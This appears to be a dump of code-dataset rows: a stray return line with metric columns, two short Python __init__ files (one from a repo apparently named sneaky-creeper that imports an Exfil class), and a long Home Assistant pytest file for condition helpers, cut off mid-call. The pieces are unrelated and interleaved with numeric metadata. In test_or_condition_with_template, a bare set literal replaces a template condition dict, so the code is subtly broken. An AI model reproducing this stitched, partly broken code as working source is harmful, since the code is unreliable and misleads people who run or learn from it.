return {'openid': request.openid} | 29 | 37 | 0.706897 | 7 | 58 | 5.857143 | 0.571429 | 0.634146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 58 | 2 | 37 | 29 | 0.82 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
fe2220f257bdd2de8ac19436b8f3be9e5da499b4 | 33 | py | Python | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 146 | 2015-04-02T23:25:07.000Z | 2022-02-17T17:37:33.000Z | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 90 | 2015-04-23T23:33:11.000Z | 2021-06-01T21:58:35.000Z | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 29 | 2015-08-08T20:38:09.000Z | 2021-06-29T19:06:13.000Z | from sneakers.exfil import Exfil
| 16.5 | 32 | 0.848485 | 5 | 33 | 5.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fe22caae49b802d2e8ad54ad241763b2b2877820 | 46 | py | Python | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | from .image_modelling import ToTensor, Resize
| 23 | 45 | 0.847826 | 6 | 46 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 1 | 46 | 46 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2290ce9f679bbcba130396e26d42e363e84d2c40 | 91,958 | py | Python | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | 2 | 2020-03-29T05:32:57.000Z | 2021-06-13T06:55:05.000Z | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | null | null | null | """Test the condition helper."""
from datetime import datetime
from unittest.mock import patch
import pytest
from homeassistant.components import sun
import homeassistant.components.automation as automation
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.exceptions import ConditionError, HomeAssistantError
from homeassistant.helpers import condition, trace
from homeassistant.helpers.template import Template
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import async_mock_service
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
hass.config.set_time_zone(hass.config.time_zone)
hass.loop.run_until_complete(
async_setup_component(hass, sun.DOMAIN, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
)
def teardown():
"""Restore."""
dt_util.set_default_time_zone(ORIG_TIME_ZONE)
def assert_element(trace_element, expected_element, path):
"""Assert a trace element is as expected.
Note: Unused variable 'path' is passed to get helpful errors from pytest.
"""
expected_result = expected_element.get("result", {})
# Check that every item in expected_element is present and equal in trace_element
# The redundant set operation gives helpful errors from pytest
assert not set(expected_result) - set(trace_element._result or {})
for result_key, result in expected_result.items():
assert trace_element._result[result_key] == result
# Check for unexpected items in trace_element
assert not set(trace_element._result or {}) - set(expected_result)
if "error_type" in expected_element:
assert isinstance(trace_element._error, expected_element["error_type"])
else:
assert trace_element._error is None
@pytest.fixture(autouse=True)
def prepare_condition_trace():
"""Clear previous trace."""
trace.trace_clear()
def assert_condition_trace(expected):
"""Assert a trace condition sequence is as expected."""
condition_trace = trace.trace_get(clear=False)
trace.trace_clear()
expected_trace_keys = list(expected.keys())
assert list(condition_trace.keys()) == expected_trace_keys
for trace_key_index, key in enumerate(expected_trace_keys):
assert len(condition_trace[key]) == len(expected[key])
for index, element in enumerate(expected[key]):
path = f"[{trace_key_index}][{index}]"
assert_element(condition_trace[key][index], element, path)
async def test_invalid_condition(hass):
"""Test if invalid condition raises."""
with pytest.raises(HomeAssistantError):
await condition.async_from_config(
hass,
{
"condition": "invalid",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
],
},
)
async def test_and_condition(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "And Condition",
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "120", "wanted_state": "100"}}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "105", "wanted_state": "100"}}
],
}
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 100.0}}],
}
)
async def test_and_condition_raises(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "And Condition",
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"above": 110,
},
],
},
)
# All subconditions raise, the AND-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subconditions raises, the second returns True, the AND-condition
# should raise
hass.states.async_set("sensor.temperature2", 120)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 120.0}}],
}
)
# The first subconditions raises, the second returns False, the AND-condition
# should return False
hass.states.async_set("sensor.temperature2", 90)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 90.0,
"wanted_state_above": 110.0,
}
}
],
}
)
async def test_and_condition_with_template(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Template Condition",
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [
{"result": {"entities": ["sensor.temperature"], "result": False}}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Or Condition",
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "120", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 120.0,
"wanted_state_below": 110.0,
}
}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "105", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 105.0}}],
}
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
}
)
async def test_or_condition_raises(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Or Condition",
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"above": 110,
},
],
},
)
# All subconditions raise, the OR-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subconditions raises, the second returns False, the OR-condition
# should raise
hass.states.async_set("sensor.temperature2", 100)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 100.0,
"wanted_state_above": 110.0,
}
}
],
}
)
# The first subconditions raises, the second returns True, the OR-condition
# should return True
hass.states.async_set("sensor.temperature2", 120)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 120.0}}],
}
)
async def test_or_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{'{{ states.sensor.temperature.state == "100" }}'},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_not_condition(hass):
"""Test the 'not' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Not Condition",
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "101", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 101.0,
"wanted_state_below": 50.0,
}
}
],
}
)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "50", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{"result": {"result": False, "state": 50.0, "wanted_state_below": 50.0}}
],
}
)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "49", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 49.0}}],
}
)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
}
)
async def test_not_condition_raises(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Not Condition",
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"below": 50,
},
],
},
)
# All subconditions raise, the NOT-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subconditions raises, the second returns False, the NOT-condition
# should raise
hass.states.async_set("sensor.temperature2", 90)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{"result": {"result": False, "state": 90.0, "wanted_state_below": 50.0}}
],
}
)
# The first subconditions raises, the second returns True, the NOT-condition
# should return False
hass.states.async_set("sensor.temperature2", 40)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 40.0}}],
}
)
async def test_not_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_time_window(hass):
"""Test time condition windows."""
sixam = "06:00:00"
sixpm = "18:00:00"
test1 = await condition.async_from_config(
hass,
{"alias": "Time Cond", "condition": "time", "after": sixam, "before": sixpm},
)
test2 = await condition.async_from_config(
hass,
{"alias": "Time Cond", "condition": "time", "after": sixpm, "before": sixam},
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=3),
):
assert not test1(hass)
assert test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=9),
):
assert test1(hass)
assert not test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=15),
):
assert test1(hass)
assert not test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=21),
):
assert not test1(hass)
assert test2(hass)
async def test_time_using_input_datetime(hass):
"""Test time conditions using input_datetime entities."""
await async_setup_component(
hass,
"input_datetime",
{
"input_datetime": {
"am": {"has_date": True, "has_time": True},
"pm": {"has_date": True, "has_time": True},
}
},
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.am",
"datetime": str(
dt_util.now()
.replace(hour=6, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.pm",
"datetime": str(
dt_util.now()
.replace(hour=18, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=3),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=9),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=15),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=21),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
# Trigger on PM time
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=18, minute=0, second=0),
):
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(hass, after="input_datetime.pm")
assert not condition.time(hass, before="input_datetime.pm")
# Trigger on AM time
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=6, minute=0, second=0),
):
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(hass, after="input_datetime.am")
assert not condition.time(hass, before="input_datetime.am")
with pytest.raises(ConditionError):
condition.time(hass, after="input_datetime.not_existing")
with pytest.raises(ConditionError):
condition.time(hass, before="input_datetime.not_existing")
async def test_state_raises(hass):
"""Test that state raises ConditionError on errors."""
# No entity
with pytest.raises(ConditionError, match="no entity"):
condition.state(hass, entity=None, req_state="missing")
# Unknown entities
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": ["sensor.door_unknown", "sensor.window_unknown"],
"state": "open",
},
)
with pytest.raises(ConditionError, match="unknown entity.*door"):
test(hass)
with pytest.raises(ConditionError, match="unknown entity.*window"):
test(hass)
# Unknown attribute
with pytest.raises(ConditionError, match=r"attribute .* does not exist"):
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.door",
"attribute": "model",
"state": "acme",
},
)
hass.states.async_set("sensor.door", "open")
test(hass)
# Unknown state entity
with pytest.raises(ConditionError, match="input_text.missing"):
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.door",
"state": "input_text.missing",
},
)
hass.states.async_set("sensor.door", "open")
test(hass)
async def test_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"state": "100",
},
],
},
)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 100)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 101)
hass.states.async_set("sensor.temperature_2", 100)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 101)
assert not test(hass)
async def test_multiple_states(hass):
"""Test with multiple states in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "State Condition",
"condition": "state",
"entity_id": "sensor.temperature",
"state": ["100", "200"],
},
],
},
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
hass.states.async_set("sensor.temperature", 200)
assert test(hass)
hass.states.async_set("sensor.temperature", 42)
assert not test(hass)
async def test_state_attribute(hass):
"""Test with state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"state": 200,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 200})
with pytest.raises(ConditionError):
test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 200})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "200"})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_state_attribute_boolean(hass):
"""Test with boolean state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "happening",
"state": False,
},
)
hass.states.async_set("sensor.temperature", 100, {"happening": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": True})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"no_happening": 201})
with pytest.raises(ConditionError):
test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": False})
assert test(hass)
async def test_state_using_input_entities(hass):
"""Test state conditions using input_* entities."""
await async_setup_component(
hass,
"input_text",
{
"input_text": {
"hello": {"initial": "goodbye"},
}
},
)
await async_setup_component(
hass,
"input_select",
{
"input_select": {
"hello": {"options": ["cya", "goodbye", "welcome"], "initial": "cya"},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.salut",
"state": [
"input_text.hello",
"input_select.hello",
"salut",
],
},
],
},
)
hass.states.async_set("sensor.salut", "goodbye")
assert test(hass)
hass.states.async_set("sensor.salut", "salut")
assert test(hass)
hass.states.async_set("sensor.salut", "hello")
assert not test(hass)
await hass.services.async_call(
"input_text",
"set_value",
{
"entity_id": "input_text.hello",
"value": "hi",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "hi")
assert test(hass)
hass.states.async_set("sensor.salut", "cya")
assert test(hass)
await hass.services.async_call(
"input_select",
"select_option",
{
"entity_id": "input_select.hello",
"option": "welcome",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "welcome")
assert test(hass)
async def test_numeric_state_known_non_matching(hass):
"""Test that numeric_state doesn't match on known non-matching states."""
hass.states.async_set("sensor.temperature", "unavailable")
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": 0,
},
)
# Unavailable state
assert not test(hass)
# Unknown state
hass.states.async_set("sensor.temperature", "unknown")
assert not test(hass)
async def test_numeric_state_raises(hass):
"""Test that numeric_state raises ConditionError on errors."""
# Unknown entities
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_unknown", "sensor.humidity_unknown"],
"above": 0,
},
)
with pytest.raises(ConditionError, match="unknown entity.*temperature"):
test(hass)
with pytest.raises(ConditionError, match="unknown entity.*humidity"):
test(hass)
# Unknown attribute
with pytest.raises(ConditionError, match=r"attribute .* does not exist"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "temperature",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Template error
with pytest.raises(ConditionError, match="ZeroDivisionError"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"value_template": "{{ 1 / 0 }}",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Bad number
with pytest.raises(ConditionError, match="cannot be processed as a number"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", "fifty")
test(hass)
# Below entity missing
with pytest.raises(ConditionError, match="'below' entity"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.missing",
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Below entity not a number
with pytest.raises(
ConditionError,
match="'below'.*input_number.missing.*cannot be processed as a number",
):
hass.states.async_set("input_number.missing", "number")
test(hass)
# Above entity missing
with pytest.raises(ConditionError, match="'above' entity"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": "input_number.missing",
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Above entity not a number
with pytest.raises(
ConditionError,
match="'above'.*input_number.missing.*cannot be processed as a number",
):
hass.states.async_set("input_number.missing", "number")
test(hass)
async def test_numeric_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Numeric State Condition",
"condition": "numeric_state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 49)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 50)
hass.states.async_set("sensor.temperature_2", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 50)
assert not test(hass)
async def test_numeric_state_attribute(hass):
"""Test with numeric state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 10})
with pytest.raises(ConditionError):
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 49})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "49"})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 51})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
with pytest.raises(ConditionError):
assert test(hass)
async def test_numeric_state_using_input_number(hass):
"""Test numeric_state conditions using input_number entities."""
await async_setup_component(
hass,
"input_number",
{
"input_number": {
"low": {"min": 0, "max": 255, "initial": 10},
"high": {"min": 0, "max": 255, "initial": 100},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.high",
"above": "input_number.low",
},
],
},
)
hass.states.async_set("sensor.temperature", 42)
assert test(hass)
hass.states.async_set("sensor.temperature", 10)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
hass.states.async_set("input_number.high", "unknown")
assert not test(hass)
hass.states.async_set("input_number.high", "unavailable")
assert not test(hass)
await hass.services.async_call(
"input_number",
"set_value",
{
"entity_id": "input_number.high",
